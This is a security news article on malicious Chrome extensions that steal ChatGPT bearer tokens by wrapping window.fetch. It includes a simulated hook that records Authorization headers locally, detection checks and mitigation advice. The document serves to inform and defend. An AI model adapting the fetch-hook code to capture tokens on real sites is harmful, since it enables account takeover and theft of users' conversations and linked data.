Malicious Chrome Extensions Pose Threat by Stealing ChatGPT Session Tokens

Beware: Malicious Chrome Extensions Masquerading as ChatGPT Enhancements

Researchers have identified a coordinated campaign of 16 malicious Chrome extensions posing as productivity tools and ChatGPT add-ons. The extensions steal the session tokens that ChatGPT's web app sends with every API request. A session token is all the server checks, so whoever holds a copy can use the account, and read its conversations, without the password or any second factor.

Exploiting the Popularity of AI-Powered Extensions

The popularity of AI-related browser extensions has given criminals a convenient lure. The malicious extensions are installed by users themselves, from listings that look like any other productivity tool, and a legitimate ChatGPT helper needs the same permission that a malicious one abuses: the ability to run scripts on the ChatGPT site. Nothing at install time separates the two.

Technical Mechanism: Session Token Interception

Once installed, the extensions inject a script into the ChatGPT web page and replace the page's `window.fetch`, the function the ChatGPT front end uses to make its API calls, with a wrapper that inspects each request and then hands it to the original implementation. Nothing is intercepted at the network level: the wrapper runs inside the page's own JavaScript context, so it sees every request's headers in the clear, after the app has attached them, and the page keeps working normally.

When a request carries an `Authorization` header, the bearer token with which ChatGPT's front end proves who the user is, the wrapper copies it and sends it to an attacker-controlled server. Replaying that token is enough to impersonate the user for as long as it remains valid: the attacker can read every ChatGPT conversation, any stored data, and whatever connected services the account has linked, such as Google Drive, Slack, and GitHub, with no password and no second factor.
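The hook described above, modelled in plain JavaScript so it runs outside a browser. This is an added example, not code from the article or from the extensions it describes: `page` stands in for the page's `window`, `nativeFetch` for the built-in fetch, `exfil` for the attacker's collection server, and the request URL, token value and endpoint are all constructed. The defender-side checks after it show two ways a page can notice that its `fetch` has been swapped.

```javascript
// Added example, not the article's or the malware's code. Simulates the
// window.fetch hook and two defender checks; all names and values are assumed.

const exfil = []; // stands in for the attacker's collection server

// Stand-in for the browser's built-in fetch (constructed; no network is used).
function nativeFetch(input, init) {
  return Promise.resolve({ ok: true, status: 200, url: String(input) });
}

// Stand-in for window. `pristineFetch` is the reference a defender captured
// at page load, before any injected script ran.
const page = { fetch: nativeFetch };
const pristineFetch = page.fetch;

// Case-insensitive Authorization lookup for a plain object or a Headers-like object.
function getAuthorization(headers) {
  if (!headers) return null;
  if (typeof headers.get === "function") return headers.get("authorization");
  const key = Object.keys(headers).find((k) => k.toLowerCase() === "authorization");
  return key ? headers[key] : null;
}

// --- Attacker side: the technique the article describes ---------------------
// Replace win.fetch with a wrapper that copies the Authorization header of every
// request and then forwards the request unchanged, so the page keeps working.
function installTokenStealingHook(win, sink) {
  const original = win.fetch;
  win.fetch = function hookedFetch(input, init) {
    const token = getAuthorization(init && init.headers); // runs before the request is sent
    if (token) {
      // Real malware would POST this to its own server via `original(...)`;
      // here it is just recorded.
      sink.push({ url: String(input), authorization: token });
    }
    return original.call(this, input, init);
  };
}

// --- Defender side: two checks for a tampered fetch -------------------------

// 1. Identity check against the reference captured at page load. Only meaningful
//    if the reference really was taken before the injected script ran.
function fetchWasReplaced(win, reference) {
  return win.fetch !== reference;
}

// 2. Source check: a genuine built-in reports "[native code]" from
//    Function.prototype.toString; a JavaScript wrapper shows its own source.
//    The simulated nativeFetch is plain JS, so the check is demonstrated on a real
//    built-in (Array.prototype.push) as well. An attacker can patch toString too,
//    so a passing result is weak evidence; a failing one is strong.
function looksNative(fn) {
  return /\[native code\]/.test(Function.prototype.toString.call(fn));
}

// Run the scenario and return what each side observed. The capture happens
// synchronously inside the wrapper, before the request is forwarded, so the
// returned promises need not be awaited to inspect `exfil`.
function runScenario() {
  installTokenStealingHook(page, exfil);
  // Constructed request, shaped like an authenticated front-end API call.
  page.fetch("https://chatgpt.com/backend-api/conversations", {
    method: "GET",
    headers: { Authorization: "Bearer example-session-token" },
  });
  page.fetch("https://chatgpt.com/public-asset.png"); // no token: nothing captured
  return {
    stolen: exfil.map((e) => e.authorization),
    replaced: fetchWasReplaced(page, pristineFetch),
    hookLooksNative: looksNative(page.fetch),
    builtinLooksNative: looksNative(Array.prototype.push),
  };
}
```

Note what the hook does not need: no network access of its own beyond one outbound request to the attacker, no cookie access, and no change to the requests it forwards. That is why the user sees nothing wrong and why a content-script permission on the ChatGPT host is, in practice, permission to take the session.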

Broader Implications and Recommendations

The campaign shows threat actors following users onto AI platforms, and it shows how little an extension needs in order to take over a web session. Individuals should treat any extension that asks to run on the ChatGPT site as able to read the session, review what is installed (chrome://extensions), and remove anything they cannot account for. Removing a malicious extension does not invalidate a token that has already been copied, so affected users should also sign out of all active ChatGPT sessions so that the stolen token is revoked server-side. Organizations can enforce this centrally: Chrome's enterprise ExtensionInstallBlocklist policy set to `*`, combined with an ExtensionInstallAllowlist of reviewed extensions, blocks unvetted installs, and extension monitoring together with a policy restricting third-party AI tools that require deep browser integration limits what an approved extension can reach.